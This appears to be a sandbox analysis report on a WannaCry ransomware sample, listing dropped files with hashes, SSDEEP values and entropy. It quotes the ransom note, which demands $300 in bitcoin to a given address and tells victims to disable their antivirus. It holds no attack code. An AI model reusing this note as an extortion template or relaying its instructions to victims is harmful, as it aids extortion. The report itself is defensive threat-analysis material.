                                                  SSDEEP:24:lpEWqPNgGPxlcblmfaCJZcbSx66KjZE3XH2JnA9mQsMikNxJV:fbql/glmNJZiSjX2Zo7EK
                                                  MD5:5D7F1BDA9DF0FEC50FAD1C766526A4FC
                                                  SHA1:CA18AEDB6898EE6774D1B9CD58F050BC698B7863
                                                  SHA-256:D60B4B8CD438FC833563F66BF313DD4961A843B36D4D6DE6CC329EEA27105D76
                                                  SHA-512:948E1819FCB41C48824B78C8D2CFFDEFC0504EF137B7CE45E3A0C768907760163D8B02429CAB5C4DE6CD406E5C1F8CF0A4C03CC93064B5E744D5966749151D61
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8665997223515465
                                                  Encrypted:false
                                                  SSDEEP:24:bk7WO/SO62xECrETF3mRoy4BUqXYSf7vYmRPtC5CiZc4Wtk:bk7WO/SOvxECrEQX4XjYmptwCiZIk
                                                  MD5:500B0CAC082B48CD4644C17A1C4521A5
                                                  SHA1:35380CA92F229C5A2E8FC096C6DA5D763F0A6E15
                                                  SHA-256:51166FE827EAE7286501A52740DDBC20094169EA024FF8DE3B158AACCF5A028D
                                                  SHA-512:227FCBF193AB151FD9337F90637A3F055F16B89ABC8825F0A35E2EAB754447ABC2D1C2841568BEFD0DD2B9AF2E567515170DF052A2A7D70870D77925ADA5DAB6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.79388529309449
                                                  Encrypted:false
                                                  SSDEEP:24:MSbJga/CJC5gmVwdm2VQyvrWImF/Jcl6qoC4nciiWw9N/boZ/LK4d45Ri/853/:J9qJdYXImF/Sl6akcivE1Ou++0Av
                                                  MD5:B7251413F6464A956DB6CBD36894B486
                                                  SHA1:7FEBBA3BAE89421703EC50A023FB62DD53930402
                                                  SHA-256:D6C814680636728B8FBD9F15E83638436780F748E2B4B5CE8DB1ED0564D97628
                                                  SHA-512:AD5BD0D32F390EA55E0E3DD3DE20854ECAA031945775F9E3CE21F4C343B5A8B0A090C3CF56C95BB2D94C464E165B2EA2A3B20E7CA70A52FEB44FAFA2F4436399
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.866502250755112
                                                  Encrypted:false
                                                  SSDEEP:24:bkJvcJKSQasVLTG5AFd49+NG14i+iQCHEbxf+9zGf8mhEhDSQsEhXn:bkpcJZQhxj49+NyJQCHEZM02hDSxen
                                                  MD5:0D7CB9822BCD1DEC0A952173A825EE10
                                                  SHA1:EADB21368B9C7BF69F65483F71C5C89A23E1542A
                                                  SHA-256:B10A4F5D6A21F86AA2C8C73E6A5A9FCD29DA8040B936F53357416AF0E4E95EA0
                                                  SHA-512:2B18B22AE95B0BB27685BCB68F3574AE4A4601400A3F590F3C3DE78C848AC7BCE7B200BA9F2F4F2E9E9CBFE829546BC90FA4530F2EF94370148938E828161858
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.820132533577611
                                                  Encrypted:false
                                                  SSDEEP:24:+8tgG04kj0G0B1ZjjeY5jX9zq7MiAlkBxwtVaH4PYOYdZ5g:Ls4kITjTPiMibwt64gOF
                                                  MD5:6196312BC11ECCCE2C9ABF8942EAF8DE
                                                  SHA1:FC1636AFDED96DEF170ED53DD55824968C0158E5
                                                  SHA-256:44DDE71FBE214973166A773382EC2DE4C9EE893DC2723CE78C73338F26FE268E
                                                  SHA-512:D2ED06C37C721A5AB8BE97EE36C6475ABEFD7EEC132D4FCA2C61A09AB31448A2835C724CFA77094FAF03BFD3C0C794F986E0BB5A012722A5A638596B68C99FC8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.856216816598012
                                                  Encrypted:false
                                                  SSDEEP:24:bkRpnpZhJLd9Txn2RcbTNf3clU6zvJXHfyQ0b525d2b6Yl0+:bkRpn5v9TN9XNfMlU6zvF6Q0b56ngJ
                                                  MD5:C0448431C09E56275A1213E33765F314
                                                  SHA1:4AA0F0729D35BA49D457189A0878E61F0C446003
                                                  SHA-256:6D6B922634D89A0F1511655D4BDCFA29E8D3CF44BE9114EA20A67B6E3272647C
                                                  SHA-512:3BB870574A32991D7600CF9F7F635FAF7ED588523D9CB0C401FCAD4B2997C54F66EE521F78836691A1AA5C36BCFE5FB4A1A61F00D54E14172D3FFD6008DDF78B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.820916599091204
                                                  Encrypted:false
                                                  SSDEEP:24:5O1kiFV7z2wSVqmn0t/mTaNqj/hQ4xOqXkGeP8dCnXfXsWlfQajL:M1kmiIt/rqjO4xu6CnvlfzjL
                                                  MD5:9269F2A78EA195E3DDAF8439CB6CF218
                                                  SHA1:1F6FD3935FEC71946192D9D03FA1B8304E35D93E
                                                  SHA-256:E17675BA873A3B28FDA9D70183C24C369C1D1FEFE8AD9912B2F0EC0DD8FC4FC0
                                                  SHA-512:947F0B3F62CA1B73B25C24BA5B21651D7EA126EF2621FA33787653BCD97D4D1E2188FE087186BBAA7D84A327B54C2B5F9EFE5D2F1B0BC44C35CC732801212FE4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.855551687934645
                                                  Encrypted:false
                                                  SSDEEP:24:bkFbQbH0RIDhQR3taJXrcnlbldyk9EsPCrPWsW9JG/wYxhZwKikZEx9ldj:bkFeFQR3+cnl5p0TsG/PhZFi6Enj
                                                  MD5:E81551C157E4AE268B308EE4B1979909
                                                  SHA1:E3EA6918DCAEACA244E4513468F83BA9179CE18E
                                                  SHA-256:BEC985EA54272301063B585F43681F98A2B2E589219558D0C97D7E2A206DF749
                                                  SHA-512:FE592D4B4C4776A1BBAF0711F76FD7391A9868E1A2FC8DCC14E24214E8240DB5CA0B9AF0D6759A204AC44CC2B891013BFAD73D3C5735965DA274EADBFED05AB3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.820494558970135
                                                  Encrypted:false
                                                  SSDEEP:24:ADm4t/ll9llP3Vf4vQHGsbpkAjRx7nVHXhfFC3UwxYv:SmkL9lR3VAvopJrbC3jxYv
                                                  MD5:B834AC3D1BDF3E7BEC7500426F156D72
                                                  SHA1:5164996DEB6A74DF6500CF13F3DD16A30A6DD30D
                                                  SHA-256:7577B2F5654E5011AD38A6E87594F1A4093DBCC4CCBCC36FC3A4E854A66BB066
                                                  SHA-512:1F906A1FCDBDBA11286BE25423C98E8D2065DB0F263DA6A95433FF405AA0021704558DAB34679A00B7AA1CD026F5B0F27F3030F1600BD3C824582C5164D5ABC1
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.840207851552836
                                                  Encrypted:false
                                                  SSDEEP:24:bkn8Kf1uX/2p+JN0jg/yiuRtX0GyUzf9d/OKXI8dA1GMXjcBopusXCM:bkn81ukig/yJRR0Gy+lZrXNlYcauuf
                                                  MD5:25B05C352B83FB5ED412DFD2F07B0C34
                                                  SHA1:58694C9244A0A1C0379277A76D3C4C550BC6B646
                                                  SHA-256:334B7A0ECB3B534B37334F4A4BFD7B409DBF275CBC5B7048D04FB0CBB3937107
                                                  SHA-512:ECEA88BB703757AAA04B04077365BA57A9591FCBA6F7AC57685D9B6778E811362CD7D25894C31342EC3B46F03CC65FD83516D8AE4AE830950C007AB57648E6BD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.80676028200717
                                                  Encrypted:false
                                                  SSDEEP:24:rSJpEQMygrTNx917rqyh7Qns2DJDpE9l7CFu1OQlIkTxVM+X4P:+JpE9yQXrWlUsclI8xCP
                                                  MD5:8FC59C942D4674990F2316F7AB80A2A1
                                                  SHA1:744A515110B2A5925BCD5C5D730ADCFD5BE45819
                                                  SHA-256:242224D879528B17B1D050AB74C49736815934FEE16801AC93C0E10AD92FCC74
                                                  SHA-512:2B61BAA88001FEAE752EE5E44FACC36C2B9CDE666F7C97F087BA6591D573BBD4D19D1038F2690B5556C68F20E626C121E75D6942F42560BD6FE61EB4EFE5583C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.856515267934988
                                                  Encrypted:false
                                                  SSDEEP:24:bkLI415SP0k9wxGO5+rWcgTNooX7kcmFbD8MGYadCuAFV3z7q6rcjTF6y:bkLbxG7mN/zITw2F9nqgM6y
                                                  MD5:B163A07E4A1237A8E7C9744BE05FDAE9
                                                  SHA1:E92B0A9544352B22F9F4BA3AB99E81B8FB95D460
                                                  SHA-256:0E444C8BF7A7E7223260B726055AD57B84CB33564F92AB59FBB729B42DD9E449
                                                  SHA-512:97E87B3C805347A3ECFCB4E01D3178957200B6928772F1EC3627011C5779B2DDF3AF5AB379B828A01F3B149CB2C4D5CAC4676A7F78D905B6E8623543CC4C4F36
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:OpenPGP Secret Key
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.792760690895553
                                                  Encrypted:false
                                                  SSDEEP:24:Sz/F7EyhEqItP3JXovsgi3KqQIcpe2GglqtmC80i+l3MWYViI8or1:SzJEyh/ItykhP3cpe2Smx0i+Sicr1
                                                  MD5:E30D97EE5934E9889D663FA21BFFFB42
                                                  SHA1:277F5C25B363AFF68D01410EC4D6DEE0B2BAAD2A
                                                  SHA-256:D47167585F8326B885F16C6B61BBB07BD037F8C1FE01F72A3851DE903D1D7433
                                                  SHA-512:3BCD807FBBF0743B95C006236369597EFD159C9FFD3C4D0A4EFA32E6849C2FD592C409906B82D0F75061C03031C3DA89C27F5B51B3D65AB36E724F3C9F39EBC0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.855939068436425
                                                  Encrypted:false
                                                  SSDEEP:24:bk3mx9VQ3BHn7JFcoNCReHoPFZfb1tzBcLxcqqHq8aoIlwqSYp:bkJt7JFbCQIPFZfRtaeqqKH0Yp
                                                  MD5:D4DA30CFAA2A6BA071C3D2272707598F
                                                  SHA1:33C60BDC92CB0190CF80EAFECBEDE83C4510306F
                                                  SHA-256:6765CF8A9EFBF3C5CA2CCB2951566479994C2A61D70476C04CA00F09591ABAA5
                                                  SHA-512:C7675B751AB1DCF72FD5A11EDE9E0C1D05CF6910FC2BAC1E7CAF2B7D8D7124910146627BD97277CEFA1CA0B85EF174F838F6008BFE3073C45980092AF830B620
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.824693748645433
                                                  Encrypted:false
                                                  SSDEEP:24:ufJV5Uio6PDRe4nDNMz3VV/OjgTzE6WOTKXceNPJwK57kFxMqD2n5:0JV0cgA2jn2+2hNPSK57k0nn5
                                                  MD5:5C1258FA6EB4A7CA8DEF84613E949FB6
                                                  SHA1:E9866B0512F65915CEF74D86596392291DD34A72
                                                  SHA-256:B717F20424050A12E4F5D8E5D0183AD2AF4C0885E296C434759E156FAEEAA539
                                                  SHA-512:53B384845D566A9EF1435CE8BD77A7AEC65C4133ED5B419D3CB10617AFAE0F992E84C5931E84EDEB86B2316C23B8438989DF0943A345D3FA7040973B3591ADA5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.849805205167774
                                                  Encrypted:false
                                                  SSDEEP:24:bk1EsmSEu2cxI4obGP97LdePklC4ycBj8YDyaL0KLHi:bkCny2cxGGP9tN7TTWaL9Hi
                                                  MD5:E2E175B95982C1837C1719E9902A3BBF
                                                  SHA1:EBBDC3450D0E86980A741AFEF4297D0E1861CC5E
                                                  SHA-256:FCCBFD4E65BA524E9711CCC1F4543C1C42534BF2B8C00C9FE7F402329B16514D
                                                  SHA-512:F9B54A2CE40A19E8224E6747A10B253ED465CD9013E8BE987FD3F92E8F262DA9CDEF033D4B8154ADAC68643E5CBEDD5EDD59F8C3E5F0CBD21C77203FF2F972C4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.808252857964589
                                                  Encrypted:false
                                                  SSDEEP:24:8c7nuG8KrmN1cwd/iycCSAA4LzWHjYMt4tgpJVbpPpQi3XzAElaDB8Gia:8wJ8KrberSAlY07ypJVbpRQi3X1cDB8M
                                                  MD5:21A1614C2FA810863177725C016EC1E1
                                                  SHA1:895166AF0C193AD661F6AC244C81E00AC347B534
                                                  SHA-256:DC1D239A74055845FDB687708BA1A791C7E79EAE3FABBAC678FD4239BE3C7811
                                                  SHA-512:83A06BC9F21775810E73D70FE7423A1D5350373534F5181CB6C2942767860EA41306542E6E792CFF610C2610714B1BC296792E3B72E78B4383CB116E7B1031C4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8392789198126795
                                                  Encrypted:false
                                                  SSDEEP:24:bkiD6eCCD+YiNjJ1RqS2doN07NODAMxjphsBDjz4ksC6Ju/2gU2m9m+s0MswRI3:bkDrCD+YiNt11aW4oBpSDMnu+Imr1
                                                  MD5:12E8027A4D2F1292CC39394C76B2E3E3
                                                  SHA1:8CE9A2E1E04D58A798A34543FA6AD313AA7ABEDE
                                                  SHA-256:F3786950FDFBFC583F39E04D693140FF577E734E30A58C6BB58FB1E40CDCD0B9
                                                  SHA-512:2559E44192A1C374D6AE71267D5903F346567AEBECBD14127C23F6A77AFB3F74B50CC6F512610DF7C5CB6C512892CB804531F403FB44A518770D3B1B6958B45A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.826350738111068
                                                  Encrypted:false
                                                  SSDEEP:12:YruZFeeEax/HHEboxwL8cNA6rUfMENZP/ikLcYMdUPnubgc6Zip1yQ9+a25rtDm6:YruZ4KxPk2EN/GnJWcyp1yS+V3nCi
                                                  MD5:166C30A46A36C94357E0F1D9CDEB0C88
                                                  SHA1:4A5AEA9D5A129F7BAD1F9AE7E6B6FA39B066FB88
                                                  SHA-256:2082B8733FC817CC4FF6BBE04E7148D8B076AD6AFD32F2FE92C50D0E46346F61
                                                  SHA-512:584D2A89B1B4AC532640D2BA6D144516E64B567AA718C2A782501571FBAAF58E6E92C86074EA1AB8A14E995DE228FF8AECA1A70EA2449383F113D5E9C30AAB4A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.853731784647624
                                                  Encrypted:false
                                                  SSDEEP:24:bkhA+ZY0DukS9uZ+3RmUq3tJmp0fD5TyTPBlhZtVMPrgEvqLt:bkhA/0DukSsZxUPpuDd8LEPrgEvqLt
                                                  MD5:84B04E6235B576D881C9380FF863A557
                                                  SHA1:673049FE8E17F101C9D4298F9A65DCFCA9E4D4EF
                                                  SHA-256:0633875F00D733E4172D19BA1FF31D7B7250AF8205E115CDFF28F3AB27231DAD
                                                  SHA-512:18376A1F0B60224A8EFD1E88B093C07B0787396E6520E5F4CF1CDC1A83CD82BFCFE6E6056BB9B4BC2B31665197BF7CEFDBD90F957343B9B210CECB1356439828
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.827138986530992
                                                  Encrypted:false
                                                  SSDEEP:24:wtCE+sU3w+zUgHK71/MWELrWYqI18n7Xav+9Pv9SkNRuItwHv:sCE+sU38h/MW3YqI18jamZlSk/tYv
                                                  MD5:C91BF4314249D2EEDEDC77C69825BB54
                                                  SHA1:267E54AC46199A225AFE502ABD091E9110664C7C
                                                  SHA-256:BF72B3A5D071B1E075DF7181693D496A5660E4EFF0E3AF9AC34F60BFE6D79CB5
                                                  SHA-512:6A8A3E57DA22410EDD4C929AFD10ED76880010B5455FD620471C6330C3E577600F2C8303ED97748A446755DB84E522B159B4C0DD8AFF2C212018B4F7741D7DED
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.843788769474621
                                                  Encrypted:false
                                                  SSDEEP:24:bkngIl/joZWo6l8ZhTzZhVEmuqJDe2EWW9tMAY6wu+0LHgs2VxhI:bknl/joZzlZhBhVEmumDe2XW9iuvLohI
                                                  MD5:24619C16C028273D5E4C0B038C76C301
                                                  SHA1:9B3FCC23C54477DF2A2A55A1B2D3B5CF59A30890
                                                  SHA-256:C968F6094792CE0FBB1E3CE821A48E7C9C33AE2194A8FEA25A741B5859D9C196
                                                  SHA-512:85435CE80009F613E661ECD68BF4C22006124BF8BE8E9259D3D3F3BC32F146A5C9630B02463FA84CE0769DC0D4329FCB6FF292C8ADB1BB0110E9005E3CFD0CE6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.805035461004647
                                                  Encrypted:false
                                                  SSDEEP:12:kjw8faCyaIJ/AaD3qXVVJzjBtOVhI+s/HW+aOTcU6WqQxQ5MJ9oIPFNePOrpCOzm:kjmLoq63sVhw5TcNvQFnreWVCOdloh
                                                  MD5:7485113F60BE889E2FDC4C9E9A574067
                                                  SHA1:8452EB15A0E83D51A3145E7197EAB8AD4D0AB153
                                                  SHA-256:B93DFBA4341FE40ADA18AA969743BC51F7C9E6345D54323EABE23E44E5BEA52C
                                                  SHA-512:8AEBD4C62F3E0EF0D51C1CDD58616CFF42648594A80252D194D61EAEC9640DC69C8CA15AAF814C9C0AAD0FAFA94D880E164CF0C06BFB80F32B32C87E448DCABC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.848800785540179
                                                  Encrypted:false
                                                  SSDEEP:24:bkTAeGHkx9b94PIZUG9EYaDJGEt4pX/fGi1CCKoKk+X3eXzK5cRTFRBsN7u+:bkjvb94PqXuJ1tavbRsHkm4TFRqd
                                                  MD5:9BD4F66C8D9D260F2C315286C91285B3
                                                  SHA1:29DE5CC33D0215C3496C2B70252B2E36C1023F9C
                                                  SHA-256:A97ABA92B7F0172A81CE74C4BA10D1550A91D85E78839230C536F1E2AA05A72E
                                                  SHA-512:B500050462C5A6D818D2A89A3A44B754F45D501331BC7ED0C92B77B2C4C18D86DBC89D7B51F7646845F2895048C89EDC0FA2AF9A9E4DF394FF8A7322409DBFC6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.774742916772408
                                                  Encrypted:false
                                                  SSDEEP:24:+V6at8Qu1/llHc3EXXMk7m9fo5Mvs/VNA4Yukqv:U6OHS/lO+XZ7m9fo5MU/v
                                                  MD5:97F5921D5A7DC61DAB021FF6BB6A0214
                                                  SHA1:59ECF2D69C98EB3D44492E621994A7E89AF57878
                                                  SHA-256:1BBEA9E06F9167E05BB9FF219909BEC059738EEA3BBF2AD5E8BF54A08066B157
                                                  SHA-512:15E230A62F8491A937865E0657287768F98A6F473F12BF1D8342E91A36CA173695C31F3EC2D4F65653B0B0E728DF53EA9C4CD6F91F33702C2C5ADE11D1DE644A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8310369084733065
                                                  Encrypted:false
                                                  SSDEEP:24:bkYEHXhwHvSm2C6ygNRLlJ7GriZQGq5Vn+/NDkCEsRciJjhAAA:bkYyXhV/jhJ7GWZjqMDtEsRckjFA
                                                  MD5:1A7D475B62BFC9A83B2931B55487F7AE
                                                  SHA1:2FEB2FDA6A52CEBF5FC3FC7DCF25DB1F15BE27AE
                                                  SHA-256:5BDDC4748BAD5264B840A6B6D74ECEBF31FB2A396313166CC9BCB1FCFE853AF0
                                                  SHA-512:EAA9068EF6ACD6371B5CE7AD7E4465F7AA928C2F3DA0B2E0C3749535DB2A7CA8D249409F27B79441A45658B8A13398BBC22C88D486A7E8C7D3A4CC08208613A3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.847505072532563
                                                  Encrypted:false
                                                  SSDEEP:24:YLydq3ZLeW39JRkVwwYUct6g0z7HYJdfbUcy90pI6G4Yqh:jK7i1YHt6g0zmRgbWpHp
                                                  MD5:B4A6AF8A7034D7F880B865771AD2DAE1
                                                  SHA1:89FDD8CF2C37AAE6D8E46544FB7CBADEF7D8C4CA
                                                  SHA-256:BBA338AC7025AFD9B4D34DB3AA74635E7EF4A65BB2DABE7D21F9D6CC2C696990
                                                  SHA-512:6D750EC334959FC785297AB22C016B5479EA7B85F82CFC41D019F34187F9928A2591FFE6C758A7BF389F5B565B65452C077F08F0C1B4FA1870569A1B2D2FB5A0
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.875810869772536
                                                  Encrypted:false
                                                  SSDEEP:24:bkZh0s93Kqm/Maa55sHWHbpmRO33Fd7FHNaeAtBVgxG1Rfb8EBXGXc:bkZhCqmEaQJmgV5Ftaeo1RjRBWs
                                                  MD5:019E1C06E1ED5440D4EBCB2DA5573329
                                                  SHA1:A5C323CADFC9CA631D179D10D10F2889BB65A2CC
                                                  SHA-256:C61BF9E0A6A52A0585F06B0A199D7C4CCB60C727E6A92FEDB1CF12010348F6EC
                                                  SHA-512:0D2D8932A212CAA3A61608943F47BB6501B88336C53EDDA57B772FEA245A037BB83ACB93B983FDBBD8668E05EDAA99860E5AFFC8255FC5BB3FACD84B1BF359B5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.794064516864858
                                                  Encrypted:false
                                                  SSDEEP:24:UyuQ6tLe5xlPsBZesAIzom+xGh1m1F20T/PtjW6jERNwUVg:nuQ65Yar+Gh1uFL9jLjX/
                                                  MD5:A7FE7DA33DD6D27FE23582BE8787B170
                                                  SHA1:3D28688AF0F11667CFC93BE036D0530A79C53AEE
                                                  SHA-256:19FCA46084D702B3BD891D2E807BE4CF84EDC03FFD465A7DED7D5C5F65CE4FE4
                                                  SHA-512:B2122BD46EEC9B77665FA58D8FFD7736213E5224D0688D7FF31FBB4C8D61FC60BBFBDEF444086FC04C23C9AC4FAB578A58903599D90A4A855C3DA19F33FE4560
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8510831089474244
                                                  Encrypted:false
                                                  SSDEEP:24:bk1LEIaOUTrG757HOea/3SngRf4WGJHXKSatRuQPsxpdWK89O5XZx:bk1LEIa1adiZ3Sn64WGJ3KtRopdW1oXD
                                                  MD5:FDF9C087B8D6605DFEF17406863A0112
                                                  SHA1:E9623AF796F2AFBC5CD65AFC301B457902827EC3
                                                  SHA-256:E37E9D397F26503B0FBC91AFD2D3FF5F94425DDDE4E20975157AD034497808F5
                                                  SHA-512:13BF2A15EC419EE31E3A6A404B8BD8BFB2C1003FA5E0384E1A825CF97E7F967D9410018A626C4A7D8E651B4C7D939B0E21F23FB6998735FE62FF2E05E15E74F2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8510831089474244
                                                  Encrypted:false
                                                  SSDEEP:24:bk1LEIaOUTrG757HOea/3SngRf4WGJHXKSatRuQPsxpdWK89O5XZx:bk1LEIa1adiZ3Sn64WGJ3KtRopdW1oXD
                                                  MD5:FDF9C087B8D6605DFEF17406863A0112
                                                  SHA1:E9623AF796F2AFBC5CD65AFC301B457902827EC3
                                                  SHA-256:E37E9D397F26503B0FBC91AFD2D3FF5F94425DDDE4E20975157AD034497808F5
                                                  SHA-512:13BF2A15EC419EE31E3A6A404B8BD8BFB2C1003FA5E0384E1A825CF97E7F967D9410018A626C4A7D8E651B4C7D939B0E21F23FB6998735FE62FF2E05E15E74F2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.806038744753786
                                                  Encrypted:false
                                                  SSDEEP:24:U9AV7CVBbVSk5ChrsCPgk0bnAvb4rKxCiRnMOv:GpBBt5ChrsCPgRjY0rNiRR
                                                  MD5:1114513BBBDBFB82E197CDD8F61D085B
                                                  SHA1:DBF1AE27225CC13B2FA0460DEE7FE74B19FA3AE7
                                                  SHA-256:00966092DD665F6C8F9D95CCFA724FE689929CEBD2C4B18E415F33BDC54F0000
                                                  SHA-512:F47539CA1C88AF28DA545D37228F1EBF7D4F9910815D6479E0B6479F4EE6165CC331218C579535DDCBA5E77CB98FA000B8D47AF8EF7D7E5FE4AEC25EA477C8F0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.877518914137892
                                                  Encrypted:false
                                                  SSDEEP:24:bkPn/GjbjQHeW1jXyIFzS32iGIdnHSIkqZTsQA6jyW6AxmXW650:bkPnupW1jCIFzSGItyIjZwQVF6AxW0
